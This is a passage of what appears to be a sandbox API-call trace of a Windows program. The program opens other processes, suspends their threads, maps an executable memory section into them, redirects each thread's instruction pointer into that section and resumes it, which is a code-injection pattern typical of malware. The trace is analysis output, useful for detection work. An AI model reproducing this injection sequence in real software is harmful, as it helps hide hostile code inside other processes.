[358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.573] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0171.573] NtClose (Handle=0x138) returned 0x0 [0171.573] NtClose (Handle=0xb4) returned 0x0 [0171.574] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1054, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0171.574] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0171.574] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0171.574] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x233000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0171.574] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0171.582] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1058) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0171.582] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0171.582] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2140000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0171.596] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x233000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.602] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0171.602] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xc5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xc6000) returned 0x0 [0171.610] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xc5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x6f0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xc6000) returned 0x0 [0171.633] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0171.636] NtClose (Handle=0x140) returned 0x0 [0171.636] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x233000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x722707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.780] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0171.781] NtClose (Handle=0xb4) returned 0x0 [0171.781] NtClose (Handle=0x138) returned 0x0 [0171.783] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1064, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0171.783] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0171.783] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0171.783] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x27e000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0171.783] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0171.874] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1068) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0171.875] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0171.875] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2410000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0172.059] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, 